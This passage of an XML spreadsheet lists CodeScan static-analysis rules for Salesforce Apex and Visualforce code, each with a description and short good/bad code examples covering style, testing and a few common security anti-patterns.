  </si>
  <si>
    <t>An issue is created on a file as soon as the density of comment lines on this file is less than the required threshold.
The number of comment lines to be written in order to reach the required threshold is provided by each issue message.
Note. This rule is an alternative to existing common-rule:InsufficientCommentDensity and intended to be used only in Sonarlint
environment and/or with CodeScan IDE Plugins.</t>
  </si>
  <si>
    <t>sf:AvoidTabCharacter</t>
  </si>
  <si>
    <t>Avoid using Tab Characters Check</t>
  </si>
  <si>
    <t>Checks that there are no tab characters ('\t') in the source code.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public String bar(String string) {
 if (string != null) {	//Bad: Should not use tab indent
		return string;
	}
	if (string != null) {
		return  string;  	//Bad: Should not use tab separator.
	}
}
        &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:StaticCanNotBeUsedInInnerClass</t>
  </si>
  <si>
    <t>Static can not be used in inner classes</t>
  </si>
  <si>
    <t>Static can only be used on fields, properties and methods of top level classes only.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class BasicClass {
    public class AnInnerClass {
        public static String thing;
        public static String pubicString { get; set; }
        public static String getMessage() {
            return 'Hello World!';
        }
    }
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:MethodReturnsInternalArray</t>
  </si>
  <si>
    <t>Method Returns Internal Array</t>
  </si>
  <si>
    <t>Exposing internal arrays directly allows the user to modify some code that could be critical.&lt;br/&gt;
It is safer to return a copy of the array.&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/375"&gt;MITRE, CWE-375&lt;/a&gt; - Returning a Mutable Object to an Untrusted Caller &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/zQCuAQ"&gt;CERT, OBJ05-J.&lt;/a&gt; - Do not return references to private mutable class members
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/QIEVAQ"&gt;CERT, OBJ06-J.&lt;/a&gt; - Defensively copy mutable inputs and mutable internal
  components &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/JQLEAw"&gt;CERT, OBJ13-J.&lt;/a&gt; - Ensure that references to mutable objects are not exposed
  &lt;/li&gt;
&lt;/ul&gt;
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class SecureSystem {
  String [] ud;
  public SecureSystem(){
  	this.ud = new String[]{'standard', 'second'};
  }
  public String [] getUserData() {
      return ud; //Bad: don't return the internal array directly, return a copy.
  }
  public String [] getUserDataSecure() {
      return ud.clone(); //Good: user can't unexpectedly modify content
  }
}
SecureSystem s = new SecureSystem();
s.getUserData()[0] = 'secure'; //Secure system now has an unexpected value
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:EmptySwitchLabel</t>
  </si>
  <si>
    <t>Empty Switch Label</t>
  </si>
  <si>
    <t>Avoid 'switch' statements where a label is defined but nothing is in it
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
    trigger leadDuplicatePreventer on Lead (before insert,before update) {
	  switch on triggerEvent {
	      when AFTER_INSERT {
	      	//BAD: this should not be empty
	      }
	  }
	}
 }
}
       &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:CommentedOutCode</t>
  </si>
  <si>
    <t>Avoid Commented Out Code</t>
  </si>
  <si>
    <t>Avoid leaving commented out code in the codebase.&lt;br/&gt;
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
	&lt;li&gt;MISRA C:2004, 2.4 - Sections of code should not be "commented out".&lt;/li&gt;
	&lt;li&gt;MISRA C++:2008, 2-7-2 - Sections of code shall not be "commented out" using C-style comments.&lt;/li&gt;
	&lt;li&gt;MISRA C++:2008, 2-7-3 - Sections of code should not be "commented out" using C++ comments.&lt;/li&gt;
	&lt;li&gt;MISRA C:2012, Dir. 4.4 - Sections of code should not be "commented out"&lt;/li&gt;
&lt;/ul&gt;
  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
/* 
void somethingCool(){
	//one day we should do this...     //Bad: remove this.
	if ( cool ) ...
}
*/     
  &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:LeftBracesSpacingPositions</t>
  </si>
  <si>
    <t>Left Braces Spacing Should Be Consistent</t>
  </si>
  <si>
    <t>The space between a statement or class and an opening brace should remain consistent throughout the project.  
The rule has separate parameters for classes, triggers, methods, blocks and enums.
       &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo{		// This is an example of no spaces. (Class parameter set to None)
}
public class Foo {		// This is an example of a single space. (Class parameter set to Single)
}
       &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:RightBracesLinePositions</t>
  </si>
  <si>
    <t>Right Braces Positioning Should Be Consistent</t>
  </si>
  <si>
    <t>The line positioning of closing braces should remain consistent throughout the project. 
       &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
	public void test1() {
		if ( true )
		{				// This is an example of the closing brace on the next line. (blockBracesPosition parameter set to Next)
		}
	}
}
public class Foo {
	public void test1() {
		try{
		}catch(Exception e){     // This is an example of the closing brace on the same line. (blockBracesPosition parameter set to Ignore)
		}finally{
		}
	}
}
       &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:RightBracesSpacingPositions</t>
  </si>
  <si>
    <t>Right Braces Spacing Should Be Consistent</t>
  </si>
  <si>
    <t>The space between a closing brace and the next statement should remain consistent throughout the project.
       &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo{
	public void example1(){
		if ( true ){
		}else{			// This is an example of no spaces. (Rule set to None)
		}
	}
}
public class Bar{
	public void example2(){
		if ( true ){
		} else{			// This is an example of a single space. (Rule set to Single)
		}
	}
}
       &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:ThrowFromFinallyBlock</t>
  </si>
  <si>
    <t>Throw from Finally Block</t>
  </si>
  <si>
    <t>Avoid throwing from a finally block, this can discard any previous exceptions.&lt;br/&gt;
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/584.html"&gt;MITRE, CWE-584&lt;/a&gt; - Return Inside Finally Block &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/mIEbAQ"&gt;CERT, ERR04-J.&lt;/a&gt; - Do not complete abruptly from a finally block &lt;/li&gt;
&lt;/ul&gt;
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Bar {
	public String foo() {
		try {
			...
		} catch (Exception e) {
			throw e;
		} finally {
			throw new Exception('My Exception');  		//Bad: Throwing an exception is not recommended here.
		}
	}
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:ClassNamedException</t>
  </si>
  <si>
    <t>Exception Classes Should Extend an Exception</t>
  </si>
  <si>
    <t>A Class name that ends in "Exception" should extend an exception.
		&lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class MyException { //Bad: we would expect this class to be an exception
}
public class MyException extends Exception { //Good: this class is an exception after all.
}
		&lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidInstantiatingObjectsInLoops</t>
  </si>
  <si>
    <t>Avoid instantiating objects in loops</t>
  </si>
  <si>
    <t>New objects created within loops should be checked to see if they can created outside and reused.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Something {
	public static void main( String as[] ) {  
		for (Integer i = 0; i &lt; 10; i++) {
			Foo f = new Foo(); 			//Bad: avoid this whenever you can, it's really expensive.
		}
	}
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:StringInstantiation</t>
  </si>
  <si>
    <t>String Instantiation</t>
  </si>
  <si>
    <t>Avoid instantiating String objects; this is usually unnecessary since they are immutable and can be safely shared.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
private String bar = new String('bar'); //Bad: this is not recommended.
private String bar = 'bar';				//Good: this is preferred.
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:exception</t>
  </si>
  <si>
    <t>Tracks CodeScan Parser Problems</t>
  </si>
  <si>
    <t>An exception occurred while parsing this file. Please send a description of this problem to support@code-scan.com.&lt;BR&gt;
&lt;BR&gt;
WARNING: No violation can be detected on this file due this error.</t>
  </si>
  <si>
    <t>sf:MethodNamingConventions</t>
  </si>
  <si>
    <t>Method Naming Conventions</t>
  </si>
  <si>
    <t>Method names should always begin with a lower case character, and should not contain underscores.
          &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
	public void fooStuff() {  //Good: camel-case is preferred.
	}
	public void Foo_Bar(){    //Bad: not recommended.
	}
}
          &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidUsingHardCodedId</t>
  </si>
  <si>
    <t>Avoid Using Hard Coded Salesforce Id</t>
  </si>
  <si>
    <t>Application with hard-coded Salesforce Ids can become impossible to deploy in some cases. 
Using Custom Settings for Salesforce Ids is preferable.
	    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
	private String RecordTypeId = '906F00000008msrIAA'; 	//Bad: Salesforce Id should not be hard-coded.
	public String GetId(){
		return ServerSettings__c.getInstance().MyId__c;  //Good: Salesforce Id is fetched from custom settings. 
	}
}
	    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:ShortVariable</t>
  </si>
  <si>
    <t>Short Variable Name</t>
  </si>
  <si>
    <t>Fields, local variables, or parameter names that are very short are not helpful to the reader.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Something {
	private Integer q = 15; 						//Bad: the field name is too short.
	public static void main( String as[] ) {  	//Bad: parameter name is too short.
		Integer r = 20 + q; 						//Bad: local variable name is too short.
		for (Integer i = 0; i &lt; 10; i++) { 			//Good: this is not a violation (inside 'for' loop).
			//do stuff
		}
	}
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:EmptyWhileStmt</t>
  </si>
  <si>
    <t>Empty While Statement</t>
  </si>
  <si>
    <t>Avoid instances where a while statement does nothing.  
       &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
void bar(Integer a, Integer b) {
	while (a == b) {
						//Bad: Nothing is done here.
	}
}
       &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:SingularField</t>
  </si>
  <si>
    <t>Private Field Could Be Declared Locally</t>
  </si>
  <si>
    <t>Fields whose scopes are limited to just single methods do not rely on the containing
object to provide them to other methods. They may be better implemented as local variables
within those methods.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
    private Integer x;
    public void foo(Integer y) {			 
     x = y + 5;			//Bad: x has no reason to exist at the Foo instance level.
     return x;
    }
    public void bar(Integer y) {			 
     integer x = y + 5;			//Good: x is declared within the method.
     return x;
    }
}
   &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UseCollectionIsEmpty</t>
  </si>
  <si>
    <t>Use Collection isEmpty</t>
  </si>
  <si>
    <t>The isEmpty() method on Lists, Maps and Sets are provided to determine if a collection has any elements.
Comparing the value of size() to 0 does not convey intent as well as the isEmpty() method.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
  void good() {				//Good: Preferred.
    List foo = getList();
    if (foo.isEmpty()) {
      doWork();
    }
  }
  void bad() {				//Bad: Not recommended.
    List foo = getList();
    if (foo.size() == 0) {
      doWork();
    }
  }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UnitTestsShouldIncludeStartTest</t>
  </si>
  <si>
    <t>Unit Test Method should include Test.StartTest() and Test.StopTest()</t>
  </si>
  <si>
    <t>Unit tests should include Test.startTest() and Test.stopTest()
        &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
@IsTest
public class Foo  {
   public static testmethod void testSomething() {
      Bar b = findBar();
      Test.startTest();
	  // System.assert(b.isX());
	  b.work();
      Test.stopTest();
   }
}
        &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:IfElseStmtsMustUseBraces</t>
  </si>
  <si>
    <t>If Else Statements Must Use Braces</t>
  </si>
  <si>
    <t>Avoid using 'if..else' statements without using surrounding braces. If the code formatting 
or indentation is lost then it becomes difficult to separate the code being controlled 
from the rest.
       &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
if (foo)			
       x = x+1;
   else            //Bad: Not recommended.
       x = x-1;
if (foo){			
	x++;
} else {          //Good: This is preferred.
	y++;
}
if (foo) x++;		//This is ignored. The rule doesn't check this statement.
       &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UnusedPrivateField</t>
  </si>
  <si>
    <t>Unused Private Field</t>
  </si>
  <si>
    <t>Detects when a private field is declared and/or assigned a value, but not used.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Something {
  private static Integer FOO = 2; //Bad: this field is unused.
  private Integer i = 5; //Bad: this field is unused.
  private Integer j = 6;
  public Integer addOne() {
    return j++;
  }
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UnnecessaryParentheses</t>
  </si>
  <si>
    <t>Unnecessary Parentheses</t>
  </si>
  <si>
    <t>Sometimes expressions are wrapped in unnecessary parentheses, making them look like function calls.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
   boolean bar() {
      return (true);
      }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:EmptyInitializer</t>
  </si>
  <si>
    <t>Empty Initializer</t>
  </si>
  <si>
    <t>Empty initializers serve no purpose and should be removed.
       &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
   static {} //Bad: This serves no purpose...
   {} 		//and neither does this.
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:MultipleTriggersOnObject</t>
  </si>
  <si>
    <t>Avoid creating multiple triggers on the same object</t>
  </si>
  <si>
    <t>Avoid creating multiple triggers on the same object
&lt;pre&gt;
trigger AccountTriggerInsert on Account (before insert) {	//Bad: Multiple triggers on the same object should be avoided.
}
trigger AccountTriggerUpdate on Account (before update) {
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:SimplifyBooleanReturns</t>
  </si>
  <si>
    <t>Simplify Boolean Returns</t>
  </si>
  <si>
    <t>Avoid unnecessary if-then-else statements when returning a boolean. The result of
the conditional test can be returned instead.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public boolean isBarEqualTo(Integer x) {
	if (bar == x) {		 //Bad: This bit of code...
		return true;
	} else {
		return false;
    }
}
public boolean isBarEqualTo(Integer x) {
   	return bar == x;	//Good: ...can be replaced with this.
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidGetSetMethods</t>
  </si>
  <si>
    <t>Avoid Get and Set Methods</t>
  </si>
  <si>
    <t>Accessor methods should be defined with the field.  If the get or set method does not relate to a field, consider renaming the method.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {					
	private Boolean rightWay{
		get{
		  return rightWay;
		} 
		set {					//Good: Accessors are defined with the field.
		  rightWay = value;
		}
    }  
	private Boolean wrongWay = 'true';
	public Boolean getWrongWay() {		//Bad: This is not recommended.
		return wrongWay;
	}
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidReversedOperators</t>
  </si>
  <si>
    <t>Avoid Reversed Operators</t>
  </si>
  <si>
    <t>Reversing operators may be a bug, or at the very least make it hard to read.
Although += and =+ may at first seem like a small difference, the result is very different.  
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
Integer target = 7
integer x = 4;
target =- num; //Bad: Target is now -4, not 3. Was this expected?
target = -num; //Good: This is looks like you'd expect and will return -4.
target =+ num; //Bad: Target would be 4, not 11.
target += num; //Good: This looks correct and will return 11.
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:PossibleIncrementerBug</t>
  </si>
  <si>
    <t>Suspicious For Loop Incrementer</t>
  </si>
  <si>
    <t>Incrementers which do not match the body of the for loop could be a bug.
  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
for (X=? ; X &gt; N ; X ++ ) //Bad: Looks like the incrementer or the check is wrong.
for (X=? ; X &lt; N ; X ++ ) //Good: Incrementing up should check that X is less than N.
for (X=? ; X &gt; N ; X -- ) //Good: Decrementing should check that X is more than N.
  &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidSalesforceSystemClassNames</t>
  </si>
  <si>
    <t>Avoid Salesforce System Class Names</t>
  </si>
  <si>
    <t>Classes with names that already exist as Salesforce System classes will take precedence due to namespacing.  This can cause problems when trying to access the original Salesforce classes.
  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Database {
	//Bad: The Salesforce class Database class will not be accessible by default.
}
  &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:StatementsShouldBeOnSeparateLines</t>
  </si>
  <si>
    <t>Statements Should Be On Separate Lines</t>
  </si>
  <si>
    <t>Statements should be on separate lines to increase readability and maintainability.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
  public void foo(Integer i){
    statement(); i++;   //Bad: Statements should be on separate lines.
  }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:SwitchDensity</t>
  </si>
  <si>
    <t>Switch Statement is Too Dense</t>
  </si>
  <si>
    <t>A high ratio of statements to labels in a switch statement implies that the switch statement
is overloaded.  Consider moving the statements into new methods or creating subclasses based
on the switch variable.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
  public void bar(int x) {
    switch on x {
      when 1 {
        System.err.println('I am a fish.');
        System.err.println('I am a fish.');
        System.err.println('I am a fish.');
        System.err.println('I am a fish.');
        System.err.println('I am a fish.');	  //Bad: The switch statement is too dense.
      } 
      when 2 {
        doLotsOfStuff();    //Good: A large amount of logic is contained in a separate method.
       	break;
      }
    }
  }
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:TooFewBranchesForASwitchStatement</t>
  </si>
  <si>
    <t>Too Few Branches for a Switch Statement</t>
  </si>
  <si>
    <t>Switch statements are intended to be used to support complex branching behaviour. Using a switch for only a few
cases is ill-advised, since switches are not as easy to understand as if-else statements. In these cases use the
if-else statement to increase code readability.
        &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class TinySwitch {
	public void foo(int i) {
		switch on i {			//Bad: Two branches is not enough to require a switch statement.
			when 0 {
				//do stuff
			}
			when 1 {
				// do things
			}
		}
	}
	public void bar(int i) {
		switch on i {			//Good: Large numbers or branches are better handled by a switch statement.
			when 0 {
				//do stuff
			}
			when 1 {
				// do things
			}
			when 2 {
				// do other stuff
			}
			when 3 {
				// do a few more things
			}
			when 4 {
				// do different things
			}
			when 5 {
				// do junk
			}
		}
	}
}
        &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:EmptySwitchStatements</t>
  </si>
  <si>
    <t>Switch Statements Should Not Be Empty</t>
  </si>
  <si>
    <t>Empty switch statements serve no purpose and should be removed.
       &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public void bar() {
    Integer x = 2;
    switch on x {
        // once there was code here
        // but it's been commented out or something
    }
}
       &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidHttpReferer</t>
  </si>
  <si>
    <t>Avoid Using HTTP Referer Headers</t>
  </si>
  <si>
    <t>HTTP Referer headers can be modified by attackers. Making a decision based on the value of the referer can be dangerous.&lt;br/&gt;
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/807"&gt;MITRE, CWE-807&lt;/a&gt; - Reliance on Untrusted Inputs in a Security Decision &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/293"&gt;MITRE, CWE-293&lt;/a&gt; - Using Referer Field for Authentication &lt;/li&gt;
  &lt;li&gt; OWASP Top 10 2021 Category A7 - Broken Authentication &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat3"&gt;SANS Top 25&lt;/a&gt; - Porous Defenses &lt;/li&gt;
&lt;/ul&gt;
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
	public static void foo() {
		String referer = ApexPages.currentPage().getHeaders().get('Referer');    //Bad: Do not rely on Referer headers.
		// Do stuff with 'referer'...
	}	
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:DivisionByZeroPossible</t>
  </si>
  <si>
    <t>Division by Zero</t>
  </si>
  <si>
    <t>Division by zero exception may occur when zero could be the denominator to a division or modulo operation.&lt;br/&gt;
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/369.html"&gt;MITRE, CWE-369&lt;/a&gt; - Divide by zero &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/KAGyAw"&gt;CERT, NUM02-J.&lt;/a&gt; - Ensure that division and remainder operations do not
  result in divide-by-zero errors &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/cAI"&gt;CERT, INT33-C.&lt;/a&gt; - Ensure that division and remainder operations do not result
  in divide-by-zero errors &lt;/li&gt;
&lt;/ul&gt;
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
  public int i1 = 1 / Float.valueOf(ApexPages.currentPage().getParameters().get('value'));    //Bad: This may cause a division by zero.
  pubic getI1(){
    float value = Float.valueOf(ApexPages.currentPage().getParameters().get('value'));
      if ( value &gt; 0 )
        int i1 = 1 / value;   //Good: Division by zero is checked for.
  }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:SingleMethodSingleton</t>
  </si>
  <si>
    <t>Single Method Singleton</t>
  </si>
  <si>
    <t>Some classes contain overloaded getInstance. The problem with overloaded getInstance methods
	is that the instance created using the overloaded method is not cached and so, new objects will be created for every invocation.
	&lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Singleton {
  private static Singleton singleton = new Singleton( );
  private Singleton(){ }
  public static Singleton getInstance() {
    return singleton;
  }
  public static Singleton getInstance(Object obj){   //Bad: You should only have one getInstance() method. 
    Singleton singleton = (Singleton) obj;
		return singleton;			
  }
}
	&lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:APIVersionsRetired</t>
  </si>
  <si>
    <t>API Versions Retired</t>
  </si>
  <si>
    <t>The retirement of older Salesforce Platform API versions (7.0 through 20.0) after the Summer '22 release is a critical step to ensure the continued smooth operation of Salesforce applications.</t>
  </si>
  <si>
    <t>sf:FixDuplicateConditions</t>
  </si>
  <si>
    <t>Avoid duplicate conditions in "if"/"else if" and "switch" statements to eliminate dead code</t>
  </si>
  <si>
    <t>When the same conditions are used in statements like "if"/"else if" or "switch", it can lead to duplicated or dead code.</t>
  </si>
  <si>
    <t>sf:IdempotentBinaryOperators</t>
  </si>
  <si>
    <t>Avoid Identical Expressions on Both Sides of a Binary Operator</t>
  </si>
  <si>
    <t>When both sides of a binary operator have identical values, the condition will always give the same result.</t>
  </si>
  <si>
    <t>sf:AvoidEmailInLoops</t>
  </si>
  <si>
    <t>Avoid Sending Emails in Loops</t>
  </si>
  <si>
    <t>Avoid using Messaging.sendEmail within loops to prevent exceeding Salesforce governor limits and enhance application performance.</t>
  </si>
  <si>
    <t>sf:NcinoAvoidDescribeMapInLoops</t>
  </si>
  <si>
    <t>Avoid using methods getDescribe and getMap inside Loops</t>
  </si>
  <si>
    <t>The ‘getDescribe’ and ‘getMap’ methods typically involve fetching metadata information for objects and fields, and invoking them inside loops can result in unnecessary overhead.</t>
  </si>
  <si>
    <t>sf:RefactorAssert</t>
  </si>
  <si>
    <t>Consider Using Assert in place of System.Assert</t>
  </si>
  <si>
    <t>Salesforce’s Assert class offers a collection of static methods that assist in creating clearer assertions within Apex test code. This new class aims to enhance the readability and maintainability of test code for developers. It is preferable to use Assert in your tests instead of older System.Assert methods.</t>
  </si>
  <si>
    <t>sf:LongLines</t>
  </si>
  <si>
    <t>Lines should not be too long in APEX</t>
  </si>
  <si>
    <t>Limiting the length code lines enhances code clarity and readability by reducing complexity and improving quick understanding.</t>
  </si>
  <si>
    <t>sf:FixDuplicateMethods</t>
  </si>
  <si>
    <t>Methods should not share the same implementations</t>
  </si>
  <si>
    <t>To avoid duplication and confusion, it is important to ensure that two methods with identical implementations are avoided.</t>
  </si>
  <si>
    <t>sf:MisuseOfAssertClass</t>
  </si>
  <si>
    <t>Misuse of Assert Class</t>
  </si>
  <si>
    <t>Assert Class can be misused if not applied correctly. To ensure the correctness of our code and avoid common pitfalls, we need to establish best practices for its usage.</t>
  </si>
  <si>
    <t>sf:MultiLineComment</t>
  </si>
  <si>
    <t>Multi-line comments should not be empty</t>
  </si>
  <si>
    <t>An empty multi-line comment is likely to be a mistake and doesn’t help to improve the readability of the code. For these reasons, it should be removed.</t>
  </si>
  <si>
    <t>sf:MaximumNumberOfCase</t>
  </si>
  <si>
    <t>Switch statements should not have too many case clauses</t>
  </si>
  <si>
    <t>Switch statements with a large number of case clauses create complex and difficult-to-read code</t>
  </si>
  <si>
    <t>sf:AvoidAbsoluteURL</t>
  </si>
  <si>
    <t>URLs of Salesforce pages should be relative, not absolute</t>
  </si>
  <si>
    <t>Code using absolute URLs for Salesforce pages will break in different environments. Use relative URLs instead.</t>
  </si>
  <si>
    <t>sf:UseAreEqualInsteadOfAssertBoolean</t>
  </si>
  <si>
    <t>Use Assert Equals Instead Of Boolean Equality Assertion</t>
  </si>
  <si>
    <t>This rule detects unit test assertions in object references equality. Instead of using Assert.isTrue combined with "==" as an equality operator, these assertions should be made by more specific methods, like Assert.areEqual(expected, actual).</t>
  </si>
  <si>
    <t>sf:UseAreEqualInsteadOfIsTrue</t>
  </si>
  <si>
    <t>Use Assert.areEqual instead of Assert.isTrue</t>
  </si>
  <si>
    <t>This rule detects Unit test assertions in object references equality. Instead of using Assert.isTrue as an equality check, these assertions should be made by more specific methods, like Assert.areEqual.</t>
  </si>
  <si>
    <t>sf:UseIsTrueInsteadOfAreEqual</t>
  </si>
  <si>
    <t>Use Assert.isTrue instead of Assert.areEqual</t>
  </si>
  <si>
    <t>When asserting a value is the same as a boolean literal, use Assert.isTrue, instead of Assert.areEqual.</t>
  </si>
  <si>
    <t>sf:SystemRunAs</t>
  </si>
  <si>
    <t>Use System.runAs to test user permissions</t>
  </si>
  <si>
    <t>To ensure accurate and realistic testing of user permissions, it is crucial to utilize System.runAs during test execution. This ensures that logic is tested in the same context it will run in.</t>
  </si>
  <si>
    <t>sf:NullCoalescingOperator</t>
  </si>
  <si>
    <t>Use the null coalescing operator instead of the ternary operator</t>
  </si>
  <si>
    <t>Consider replacing ternary operators (? :) for explicit null checks with the Null Coalescing operator (??) where applicable to enhance code performance and clarity.</t>
  </si>
  <si>
    <t>sf:IfElseDefaultCase</t>
  </si>
  <si>
    <t>“If ... else if” should have “else” case</t>
  </si>
  <si>
    <t>Including a default case using an "else" statement at the end of "if" and "else if" clauses to handle all conditions and provide clarity in code.</t>
  </si>
  <si>
    <t>sf:CommentHardcodedValues</t>
  </si>
  <si>
    <t>Comment All Hardcoded Values</t>
  </si>
  <si>
    <t>Ensure that any hardcoded values or strings in the code are accompanied by descriptive comments or, alternatively, use constants. This practice enhances code readability, maintainability, and will make it easier for other developers to understand the purpose of these values.</t>
  </si>
  <si>
    <t>sf:OptimizeParallelUnitTests</t>
  </si>
  <si>
    <t>Utilizing Apex Unit Tests with @IsTest(IsParallel)</t>
  </si>
  <si>
    <t>When writing Apex unit tests, ensure that the @IsTest(IsParallel) annotation is set, whether true or false.This keeps the option of running tests in parallel visible through development to optimize test execution times.</t>
  </si>
  <si>
    <t>VISUALFORCE and AURA LIGHTNING RULES</t>
  </si>
  <si>
    <t>cs-vf:no-regex-spaces</t>
  </si>
  <si>
    <t>disallow multiple spaces in regular expressions</t>
  </si>
  <si>
    <t>&lt;p&gt;Regular expressions can be very complex and difficult to understand, which is why it's important to keep them as simple as possible in order to avoid mistakes. One of the more error-prone things you can do with a regular expression is to use more than one space, such as:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;var re = /foo   bar/;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In this regular expression, it's very hard to tell how many spaces are intended to be matched. It's better to use only one space and then specify how many spaces are expected, such as:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;var re = /foo {3}bar/;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now it is very clear that three spaces are expected to be matched.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
